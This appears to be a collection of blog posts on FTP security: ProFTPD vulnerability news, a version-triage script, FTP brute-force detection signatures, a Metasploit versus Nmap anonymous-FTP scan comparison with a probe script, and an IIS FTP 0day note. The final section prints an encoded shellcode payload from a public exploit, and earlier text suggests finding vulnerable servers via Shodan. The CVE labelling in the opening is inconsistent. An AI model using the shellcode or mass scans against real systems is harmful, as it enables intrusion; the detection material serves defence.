CVE-2010-3867 : You wanna play with ProFTPD ?

On 2010-09-24, ZDI reported a vulnerability affecting ProFTPD versions from 1.3.2rc3 through 1.3.3b. This vulnerability, a stack-based buffer overflow in the handling of Telnet IAC escape sequences on the control channel (tracked as CVE-2010-4221; CVE-2010-3867 is the mod_site_misc directory traversal fixed in the same release), allows a remote attacker to execute arbitrary code on vulnerable ProFTPD installations without authentication.

On 2010-11-02, the ZDI and ProFTPD teams released coordinated advisories (ZDI-10-229) and version 1.3.3c, which fixes the Telnet IAC remote exploit.

As always, security researchers jumped on the advisories to create working public PoCs and exploits.

On 2010-11-04, the Rapid7 team (jduck among them) integrated a working exploit into Metasploit, targeting:

On 2010-11-07, Kingcope released on Exploit-DB (EDB-ID-15449) a working exploit for:

  • ProFTPD 1.3.3a on FreeBSD 8.1 i386
  • ProFTPD 1.3.2a/e/c on FreeBSD 8.0/7.3/7.2 i386
  • ProFTPD 1.3.2e (Plesk binary) on Debian GNU/Linux 5.0
  • ProFTPD 1.3.3 (Plesk binary) on Debian GNU/Linux 5.0
  • ProFTPD 1.3.2e (Plesk binary) on Debian GNU/Linux 4.0
  • ProFTPD 1.3.3a (distro binary) on Debian Linux Squeeze/sid
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 9.3
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 10.0/10.3
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 10.2
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 11.0
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 11.1
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux SLES 10
  • ProFTPD 1.3.2e (Plesk binary) on CentOS 5

What is interesting in the Kingcope exploit is the number of “Plesk binaries” impacted by the vulnerability: at least all Plesk versions from 9.5 up to and including 10.0 are vulnerable. Play a little with Shodan and you will get a list of thousands of vulnerable servers.

Below is a demonstration video of both exploits.
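A banner list pulled from Shodan, Nmap -sV or the Metasploit scanner output is only useful once it is triaged against the affected range, so here is an added example (not part of the original post and not ProFTPD project code) that extracts the version from a ProFTPD greeting and checks it against the 1.3.2rc3 to 1.3.3b range given above. The sample banners are constructed. Caveat: a server with ServerIdent off greets with no version at all, and distribution packages may backport the fix while keeping an older version string, so this is triage, not proof of exploitability.

```python
import re

# Greeting as ProFTPD prints it with ServerIdent on, for example:
#   220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.0.2.10]
# Version forms seen in the wild: 1.3.2, 1.3.2rc3, 1.3.3b
_BANNER_RE = re.compile(r"ProFTPD\s+(\d+)\.(\d+)\.(\d+)(rc\d+|[a-z])?\b", re.IGNORECASE)


def version_key(major, minor, patch, suffix):
    """Sortable key so that 1.3.2rc3 < 1.3.2 < 1.3.2a < ... < 1.3.3 < 1.3.3a < 1.3.3c.
    Release candidates sort before the final release, a letter suffix after it."""
    suffix = (suffix or "").lower()
    if suffix.startswith("rc"):
        return (major, minor, patch, 0, int(suffix[2:]))
    if suffix:
        return (major, minor, patch, 1, ord(suffix) - ord("a") + 1)
    return (major, minor, patch, 1, 0)


def parse_proftpd_version(banner):
    """Return the version key found in a greeting line, or None if the banner
    does not identify ProFTPD (ServerIdent off, other daemon, custom text)."""
    m = _BANNER_RE.search(banner)
    if not m:
        return None
    major, minor, patch, suffix = m.groups()
    return version_key(int(major), int(minor), int(patch), suffix)


# Affected range from the advisory: 1.3.2rc3 up to and including 1.3.3b; fixed in 1.3.3c.
FIRST_AFFECTED = version_key(1, 3, 2, "rc3")
FIXED_IN = version_key(1, 3, 3, "c")


def classify_banner(banner):
    """'vulnerable' if the advertised version falls in the affected range,
    'not-affected' if outside it, 'unknown' if no ProFTPD version is visible."""
    key = parse_proftpd_version(banner)
    if key is None:
        return "unknown"
    return "vulnerable" if FIRST_AFFECTED <= key < FIXED_IN else "not-affected"


def triage(banners):
    """Map each banner line to its classification (input order preserved)."""
    return [(b, classify_banner(b)) for b in banners]


# Constructed sample banners (hosts are RFC 5737 documentation addresses).
SAMPLE_BANNERS = [
    "220 ProFTPD 1.3.3a Server (Debian) [::ffff:192.0.2.10]",
    "220 ProFTPD 1.3.2e Server (Plesk) [192.0.2.12]",
    "220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [192.0.2.11]",
    "220 ProFTPD 1.3.2rc2 Server",
    "220 FTP Server ready.",
]

if __name__ == "__main__":
    for banner, verdict in triage(SAMPLE_BANNERS):
        print(f"{verdict:13s} {banner}")
```

Feed it the `220` lines harvested by the scanners; anything classed `unknown` still needs a version check by other means (package manager on the host, or the `-sV` fingerprint).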

SUC020 : Potential FTP non anonymous Login and/or Brute-Force attempt

  • Use Case Reference : SUC020
  • Use Case Title : Potential FTP non anonymous Login and/or Brute-Force attempt
  • Use Case Detection : Firewall / IDS / FTP logs
  • Attacker Class : Opportunists / Targeting Opportunists
  • Attack Sophistication : Unsophisticated / Low
  • Identified tool(s) : Random
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 21/TCP

Possible correlations:

  • FTP brute force bot.

Source(s) :

Emerging Threats SIG 2002383 triggers are:

  • The FTP server returns the error code “530” followed by the string “Login”, “User”, “Failed” or “Not”.
  • The source is port 21 of the HOME_NET FTP server, the destination an EXTERNAL_NET IP.
  • Alerts on every 5 occurrences of the event toward the same EXTERNAL_NET IP within 300 seconds.

Emerging Threats SIG 2003303 triggers are:

  • The string “USER” is present.
  • None of the strings “PASS”, “anonymous” or “ftp” is present.
  • The source IP is part of EXTERNAL_NET, the destination the HOME_NET FTP server on port 21.
  • Alerts on every occurrence.

Emerging Threats SIG 2010643 triggers are:

  • The string “USER” is present.
  • The string “administrator” is present.
  • The source IP is part of EXTERNAL_NET, the destination the HOME_NET FTP server on port 21.
  • Alerts on every 5 occurrences of the event from the same EXTERNAL_NET IP within 60 seconds.
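To make the three triggers above concrete, here is an added example (my own code, not the Emerging Threats rule text and not from the original post) that applies the same direction, content and threshold logic to FTP control-channel lines. HOME_NET is assumed to be 192.0.2.0/24, the traffic sample is constructed, and the threshold class approximates Snort's `type threshold` (fire on every count-th hit per tracked IP inside the window, counter reset on firing or window expiry).

```python
import ipaddress
import re

# Assumption for this example: HOME_NET hosts our FTP server, everything else
# is EXTERNAL_NET (all addresses are RFC 5737 documentation ranges).
HOME_NET = [ipaddress.ip_network("192.0.2.0/24")]


def in_home_net(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in HOME_NET)


class Threshold:
    """Snort-style 'threshold type threshold': returns True on every count-th
    hit for a key (an IP) inside a window of `seconds`; the counter resets
    after firing or when the window has expired."""

    def __init__(self, count, seconds):
        self.count, self.seconds = count, seconds
        self.state = {}                       # key -> (window_start, hits)

    def hit(self, key, ts):
        start, hits = self.state.get(key, (ts, 0))
        if ts - start > self.seconds:         # window expired: start a fresh one
            start, hits = ts, 0
        hits += 1
        fire = hits >= self.count
        self.state[key] = (start, 0 if fire else hits)
        return fire


# SIG 2002383 content: "530 " followed by Login / User / Failed / Not, case-insensitive.
RE_530 = re.compile(rb"530\s+(Login|User|Failed|Not)", re.IGNORECASE)


class FtpLoginDetector:
    def __init__(self):
        self.th_2002383 = Threshold(count=5, seconds=300)  # tracked by destination (external client)
        self.th_2010643 = Threshold(count=5, seconds=60)   # tracked by source (external client)

    def inspect(self, ts, src, sport, dst, dport, payload):
        """Inspect one control-channel line; return [(sid, external_ip), ...]."""
        alerts = []
        # Server -> client: HOME_NET:21 -> EXTERNAL_NET
        if sport == 21 and in_home_net(src) and not in_home_net(dst):
            if b"530 " in payload and RE_530.search(payload):
                if self.th_2002383.hit(dst, ts):
                    alerts.append((2002383, dst))
        # Client -> server: EXTERNAL_NET -> HOME_NET:21
        if dport == 21 and not in_home_net(src) and in_home_net(dst):
            low = payload.lower()
            # SIG 2003303: USER present, none of PASS / anonymous / ftp present
            if b"user" in low and not any(x in low for x in (b"pass", b"anonymous", b"ftp")):
                alerts.append((2003303, src))
            # SIG 2010643: USER administrator, thresholded per source
            if b"user " in low and b"administrator" in low:
                if self.th_2010643.hit(src, ts):
                    alerts.append((2010643, src))
        return alerts


# Constructed sample traffic: (ts_seconds, src, sport, dst, dport, payload)
SAMPLE = [
    (0, "203.0.113.5", 40001, "192.0.2.10", 21, b"USER bob\r\n"),
    (1, "192.0.2.10", 21, "203.0.113.5", 40001, b"530 Login incorrect.\r\n"),
    (2, "203.0.113.5", 40002, "192.0.2.10", 21, b"USER anonymous\r\n"),   # excluded by 2003303
    (3, "192.0.2.10", 21, "203.0.113.5", 40002, b"530 Login incorrect.\r\n"),
    (4, "203.0.113.5", 40003, "192.0.2.10", 21, b"USER bob\r\n"),
    (5, "192.0.2.10", 21, "203.0.113.5", 40003, b"530 User bob cannot log in.\r\n"),
    (6, "203.0.113.5", 40004, "192.0.2.10", 21, b"USER bob\r\n"),
    (7, "192.0.2.10", 21, "203.0.113.5", 40004, b"530 Login incorrect.\r\n"),
    (8, "203.0.113.5", 40005, "192.0.2.10", 21, b"USER bob\r\n"),
    (9, "192.0.2.10", 21, "203.0.113.5", 40005, b"530 Login incorrect.\r\n"),  # 5th 530 -> 2002383
] + [
    (50 + 5 * i, "198.51.100.7", 41000 + i, "192.0.2.10", 21, b"USER administrator\r\n")
    for i in range(5)                                                         # 5th -> 2010643
] + [
    (400, "192.0.2.10", 21, "203.0.113.5", 40006, b"530 Login incorrect.\r\n"),  # window expired, no alert
]


def run_sample():
    """Run the detector over SAMPLE and return every alert raised, in order."""
    det = FtpLoginDetector()
    alerts = []
    for event in SAMPLE:
        alerts.extend(det.inspect(*event))
    return alerts


if __name__ == "__main__":
    for sid, ip in run_sample():
        print(f"SIG {sid} fired for {ip}")
```

Note the overlap the sample makes visible: every `USER administrator` line also satisfies 2003303, so the administrator brute force shows up as five 2003303 alerts plus one 2010643 alert. That is what the real rule set does too, and it is why the use case above lists all three signatures rather than one.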
Charts (one per signature):

  • SIG 2002383, SIG 2003303 and SIG 2010643: 1 week events activity
  • SIG 2002383, SIG 2003303 and SIG 2010643: 1 month events activity
  • 1 month TOP 10 source IPs for SIG 2002383, SIG 2003303 and SIG 2010643
  • TOP 20 source countries for SIG 2002383, SIG 2003303 and SIG 2010643

Anonymous FTP scanning differences between Metasploit and Nmap

Metasploit has an auxiliary module dedicated to anonymous FTP scanning. I was interested in comparing this Metasploit module with the Nmap ftp-anon NSE script.

I decided to scan a /19 range, which represents 8192 IP addresses, with both tools, then compare the results and the time each scan took.

    Metasploit

    Use the Metasploit CLI so that the complete scan can be timed without configuring the Metasploit database:
    time ./msfcli auxiliary/scanner/ftp/anonymous ConnectTimeout=1 FTPTimeout=1 RHOSTS=xxx.xxx.xxx.0/19 E
    By default the Metasploit ftp/anonymous auxiliary module is single-threaded; you can raise the thread count with the THREADS variable. We keep this default since Nmap is single-threaded too, but we lower the ConnectTimeout and FTPTimeout advanced options to 1 second.
    Metasploit took around 75 minutes to scan all 8192 IP addresses and returned 35 anonymous FTP servers.
    With 256 threads (to be fair ^^), Metasploit scans the 8192 IP addresses in 1 minute 27 seconds.
    We had these kinds of results :
    [*] aaa.aaa.aaa.aaa:21 Anonymous READ (220 aaa.aaa.aaa.aaa FTP server ready)
    [*] Scanned 4075 of 8192 hosts (050% complete)
    [*] Auxiliary module execution completed
    [*] bbb.bbb.bbb.bbb:21 Anonymous READ/WRITE (220 Welcome to my FTP Server)
    [*] Scanned 5045 of 8192 hosts (060% complete)
    [*] Auxiliary module execution completed
    To test whether the anonymous FTP is writable, Metasploit tries to create a directory with the MKD command; if the creation succeeds, the directory is immediately deleted with the RMD command. If the anonymous FTP is not writable, it is logically read-only 🙂 Metasploit also grabs the banner of each anonymous FTP server.
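    The login-then-MKD/RMD probe described above, as an added example written for this page (it is not the Metasploit module's code). Since the scan targets are not reproducible here, the example stands up a constructed in-process FTP control-channel stand-in that answers only USER/PASS/MKD/RMD/QUIT, with three behaviours: anonymous refused, anonymous read-only, anonymous writable. The probe directory name is an arbitrary choice.

```python
import ftplib
import socketserver
import threading


class FakeFtpServer(socketserver.ThreadingTCPServer):
    """Constructed stand-in for a remote FTP daemon: just enough of the control
    channel (USER/PASS/MKD/RMD/QUIT) for the probe below to run offline."""
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, anon_ok, writable, banner="220 Welcome to my FTP Server"):
        super().__init__(("127.0.0.1", 0), _FakeFtpHandler)   # port 0: pick a free port
        self.anon_ok, self.writable, self.banner = anon_ok, writable, banner


class _FakeFtpHandler(socketserver.StreamRequestHandler):
    def reply(self, text):
        self.wfile.write(text.encode("latin-1") + b"\r\n")

    def handle(self):
        srv = self.server
        self.reply(srv.banner)
        while True:
            line = self.rfile.readline()
            if not line:
                return
            cmd, _, arg = line.decode("latin-1").strip().partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                if srv.anon_ok and arg.lower() in ("anonymous", "ftp"):
                    self.reply("331 Anonymous login ok, send your e-mail as password")
                else:
                    self.reply("530 Login incorrect.")
            elif cmd == "PASS":
                self.reply("230 Anonymous access granted")
            elif cmd == "MKD":
                self.reply('257 "/%s" created' % arg if srv.writable else "550 Permission denied")
            elif cmd == "RMD":
                self.reply("250 RMD command successful")
            elif cmd == "QUIT":
                self.reply("221 Goodbye.")
                return
            else:
                self.reply("500 Unknown Command")


def probe_anonymous_ftp(host, port=21, timeout=3, probe_dir="anon_write_probe"):
    """Same logic as the Metasploit check: anonymous login, then MKD/RMD to test
    writability. Returns None when anonymous login is refused, otherwise a
    tuple (access, banner) with access being "READ" or "READ/WRITE"."""
    ftp = ftplib.FTP()
    ftp.connect(host, port, timeout=timeout)
    banner = ftp.getwelcome()                     # the 220 greeting, as reported by the scanner
    try:
        ftp.login("anonymous", "anonymous@example.com")
    except ftplib.error_perm:                     # 5xx on USER or PASS: no anonymous access
        ftp.close()
        return None
    access = "READ"
    try:
        ftp.mkd(probe_dir)
        access = "READ/WRITE"
        try:
            ftp.rmd(probe_dir)                    # clean up; a leftover directory is noisy evidence
        except ftplib.error_perm:
            pass
    except ftplib.error_perm:
        pass                                      # 5xx on MKD: anonymous is read-only
    try:
        ftp.quit()
    except (ftplib.Error, OSError):
        ftp.close()
    return access, banner


def run_demo():
    """Stand up the three constructed servers, probe each, return {label: result}."""
    cases = {
        "no-anon": FakeFtpServer(anon_ok=False, writable=False),
        "read-only": FakeFtpServer(anon_ok=True, writable=False),
        "read-write": FakeFtpServer(anon_ok=True, writable=True),
    }
    results = {}
    for label, srv in cases.items():
        threading.Thread(target=srv.serve_forever, daemon=True).start()
        host, port = srv.server_address
        try:
            results[label] = probe_anonymous_ftp(host, port)
        finally:
            srv.shutdown()
            srv.server_close()
    return results


if __name__ == "__main__":
    for label, res in run_demo().items():
        print(label, "->", "anonymous refused" if res is None else "Anonymous %s (%s)" % res)
```

    Against real targets, point probe_anonymous_ftp at the host list instead of the fake servers; the timeout argument plays the role of ConnectTimeout/FTPTimeout above. A server that accepts MKD but refuses RMD is reported as writable, and the probe directory is left behind, so check the output for that case before scanning ranges you do not own.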

    Nmap

    With Nmap, the following command scans for anonymous FTP, grabs the banner and fingerprints the service, but does not test whether the anonymous FTP is writable.
    time sudo nmap -p21 -n -sC -sV --script=banner --script=ftp-anon xxx.xxx.xxx.0/19
    Nmap took around 20 minutes to scan all 8192 IP addresses and returned only 11 anonymous FTP servers.
    We had these kinds of results:
    Nmap scan report for aaa.aaa.aaa.aaa
    Host is up (0.026s latency).
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     ProFTPD
    |_banner: 220 aaa.aaa.aaa.aaa FTP server ready
    |_ftp-anon: Anonymous FTP login allowed
    Service Info: Host: aaa.aaa.aaa.aaa; OS: Unix
    Nmap scan report for bbb.bbb.bbb.bbb
    Host is up (0.027s latency).
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp
    |_banner: 220 Welcome to my FTP Server
    |_ftp-anon: Anonymous FTP login allowed
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
    SF-Port21-TCP:V=5.21%I=7%D=5/16%Time=4BF05218%P=i386-apple-darwin9.8.0%r(N
    SF:ULL,1E,”220\x20Welcome\x20to\x20my\x20FTP\x20Server\r\n”)%r(GenericLine
    SF:s,33,”220\x20Welcome\x20to\x20my\x20FTP\x20Server\r\n500\x20Unknown\x20
    SF:Command\r\n”)%r(Help,33,”220\x20Welcome\x20to\x20my\x20FTP\x20Server\r\
    SF:n500\x20Unknown\x20Command\r\n”)%r(SMBProgNeg,33,”220\x20Welcome\x20to\
    SF:x20my\x20FTP\x20Server\r\n500\x20Unknown\x20Command\r\n”);
    Service Info: Host: my
    We ran the complete scans twice with each tool and got the same results both times. What is surprising is the gap between the number of anonymous FTP servers found by Metasploit (verified by hand afterwards) and the Nmap results.
    As suggested by Ron Bowes, I tested a different approach for the Nmap ftp-anon scan to reduce the scan time.
    First test with:
    time sudo nmap -p21 -PS -n --script=ftp-anon xxx.xxx.xxx.0/19
    Nmap finished the scan in 6 minutes 20 seconds: still slower than Metasploit, but no longer 20 minutes.
    Second test with:
    time sudo nmap -p21 -PS -n -T4 --script=ftp-anon xxx.xxx.xxx.0/19
    Nmap finished the scan in 6 minutes 35 seconds; the -T4 option changed nothing in terms of performance.
    Ron also confirmed that the Nmap ftp-anon Lua script randomly misses some anonymous FTP servers. One thing to rule out before blaming the script: Metasploit connects to port 21 on every address, whereas Nmap first runs host discovery, and -PS without a port list sends its SYN ping to port 80, so a host that answers only on 21/TCP can be marked down and never receive the ftp-anon probe. Rerunning with -Pn (or -PS21) removes that variable.

IIS5 & 6 FTP Stack Overflow 0day

Kingcope released today, on the Full Disclosure mailing list, a 0day targeting IIS 5 and 6 through the FTP service bundled with IIS on Windows 2000. This 0day behaves in several ways:

– on IIS 5 under Windows 2000, the exploit provides a shell on the server, allowing it to be compromised, but it requires some form of authentication (for example anonymous, a wink to Damien...) and the FTP user must be able to create a directory. Hard to exploit as anonymous.

– on IIS 6 under Windows 2003, the exploit produces a denial of service (DoS) on the server, making it unreachable (expect some DoS in the air).

#Microsoft Internet Information Server 5.0/6.0
#FTP Server Remote Stack Based Overrun
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8

To protect against these exploitation attempts, obviously grant FTP access only to trusted users, and do not let those users create directories unless they need to.

It is also possible to detect this attack with the Snort IDS using the VRT rule: (ftp_telnet) FTP command parameters were too long

SITE KSEXY‰âÚÞÙrô[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEU
BXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ
4C1JKCVLKDLPKLKQOELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEX
MYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGC
YBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0BLBOCSE1BLBGCBBOCEBPGPG1BDBME9BN
BIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVV